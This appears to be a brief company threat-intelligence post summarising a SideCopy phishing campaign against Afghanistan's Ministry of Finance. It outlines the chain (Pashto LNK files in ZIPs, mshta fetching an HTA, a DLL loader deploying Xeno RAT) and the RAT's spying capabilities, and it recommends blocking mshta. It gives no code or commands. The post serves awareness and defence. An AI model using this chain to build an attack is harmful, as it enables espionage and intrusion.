VMTech
+381 11 4150 20024/7 Discuss a project
← All Instagram insights VMTECH · INSTAGRAM

SideCopy targets Afghanistan's Ministry of Finance: Xeno RAT via LNK phishing in Pashto

SideCopy атакует Минфин Афганистана: Xeno RAT через LNK-фишинг на пушту

Colleagues, an important cyber-security alert: SideCopy targeted Afghanistan's Ministry of Finance by sending ZIP archives containing LNK files in Pashto — Operation XENOFISCAL.

Brief:
- The LNK invoked mshta.exe to fetch an HTA from a compromised domain.
- Xeno RAT 1.8.7 is deployed via a DLL loader, achieving persistence in the registry and enabling remote control.
- Capabilities include SOCKS5 tunneling, keylogging, screenshots, camera/microphone access and artifact removal.

Why it matters: demonstrates targeted attacks and fragile delivery chains — attachment filtering and blocking mshta are critical.

What practices do you employ to defend against such chains?

#cybersecurity #phishing #XenoRAT #APT

Latest comments

No comments yet.